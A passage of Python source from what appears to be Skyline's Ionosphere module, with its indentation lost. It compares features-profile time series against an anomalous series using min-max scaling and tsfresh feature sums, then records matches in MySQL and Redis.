# memcache if it has not be used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
# @modified 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Wrapped in try and except
try:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to literal_eval the fp_id_metric_ts_object in minmax_check')
fp_id_metric_ts = []
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere_echo_check':
anomaly_json = redis_anomaly_json
if not echo_anomalous_timeseries:
try:
with open((redis_anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
echo_anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(echo_anomalous_timeseries) > 0:
logger.info('echo_anomalous_timeseries was populated from anomaly json %s with %s data points from for creating the minmax_anomalous_ts' % (redis_anomaly_json, str(len(echo_anomalous_timeseries))))
else:
logger.error('error :: echo_anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % redis_anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create echo_anomalous_timeseries from anomaly json %s' % redis_anomaly_json)
else:
logger.info('echo_anomalous_timeseries has %s data points from for creating the minmax_anomalous_ts' % (str(len(echo_anomalous_timeseries))))
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if anomalous_timeseries_not_defined:
if anomalous_timeseries_not_defined and check_type == 'ionosphere':
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points from for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
if check_type == 'ionosphere':
logger.info('anomalous_timeseries has %s data points from for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_anomalous_timeseries = anomalous_timeseries
if check_type == 'ionosphere_echo_check':
use_anomalous_timeseries = echo_anomalous_timeseries
anomalous_ts_values_count = len(use_anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
lower_range_not_same = True
try:
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not calculate range similarity with the current anomalous_timeseries and the fp id %s time series' % (str(fp_id)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly Min-Max scaling will be skipped')
minmax_fp_ts = []
# if fp_id_metric_ts:
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine np_minmax with current time series anomalous_timeseries and fp id %s time series' % (str(fp_id)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# tsf_settings = ReasonableFeatureExtractionSettings()
# tsf_settings.disable_progressbar = True
minmax_fp_features_sum = None
minmax_anomalous_features_sum = None
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
# @added 20210425 - Task #4030: refactoring
except TypeError:
# This allows for the handling when the
# entry has a value of None
continue
# @modified 20210425 - Task #4030: refactoring
# except: # nosec
except Exception as e:
logger.error('error :: could not create converted timeseries from minmax_fp_ts - %s' % e)
continue
del datapoints
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
del converted
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_features from %s' % (str(minmax_fp_ts_csv)))
del df
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
del df_t
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
# @added 20210425 - Task #4030: refactoring
except TypeError:
# This allows for the handling when the
# entry has a value of None
continue
# @modified 20210425 - Task #4030: refactoring
# except: # nosec
except Exception as e:
logger.error('error :: could not create converted timeseries from minmax_anomalous_ts - %s' % e)
continue
del datapoints
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
del converted
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
del df
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
del df_t
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
# @modified 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
# Use the common function added
# try:
# fp_sum_array = [minmax_fp_features_sum]
# calc_sum_array = [minmax_anomalous_features_sum]
# percent_different = 100
# sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
# calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
# percent_different = calc_percent_different[0]
# logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
# except Exception as e:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to calculate percent_different from minmax scaled features sums - %s' % e)
percent_different = 100
try:
percent_different = get_percent_different(minmax_fp_features_sum, minmax_anomalous_features_sum, True)
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
except Exception as e:
logger.error('error :: failed to calculate percent_different between minmax scaled features sums- %s' % e)
if percent_different:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
mm_use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
mm_use_percent_similar = float(settings.IONOSPHERE_ECHO_MINMAX_SCALING_FEATURES_PERCENT_SIMILAR)
except:
mm_use_percent_similar = 3.5
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < mm_use_percent_similar:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(mm_use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check :: not anomalous - minmax scaled features profile match - %s' % (base_name))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
# Created time series resources for graphing in
# the matched page
try:
if os.path.isfile(minmax_fp_ts_csv):
self.remove_metric_check_file(str(minmax_fp_ts_csv))
except:
pass
try:
if os.path.isfile(minmax_fp_fname_out):
self.remove_metric_check_file(str(minmax_fp_fname_out))
except:
pass
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Clean up echo files
if echo_check:
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
try:
if os.path.isfile(echo_calculated_feature_file):
self.remove_metric_check_file(str(echo_calculated_feature_file))
except:
pass
echo_features_file = '%s/%s.%s.echo.fp.details.txt' % (metric_training_data_dir, str(metric_timestamp), base_name)
try:
if os.path.isfile(echo_features_file):
self.remove_metric_check_file(str(echo_features_file))
except:
pass
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous.append(base_name)
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# If there are additional echo fps then the database can be
# updated with the fp_count_with_echo value for fp_count in
# the ionosphere_matched table
if fp_count_with_echo > fp_count:
fp_count = fp_count_with_echo
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with with timestamp %s' % (
str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too as it has proved useful
# in the frontend with regards to training data sets being
# matched by layers and can do the same for in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check them we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: determining whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not should Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had an
# an opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implemenation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries)))
else:
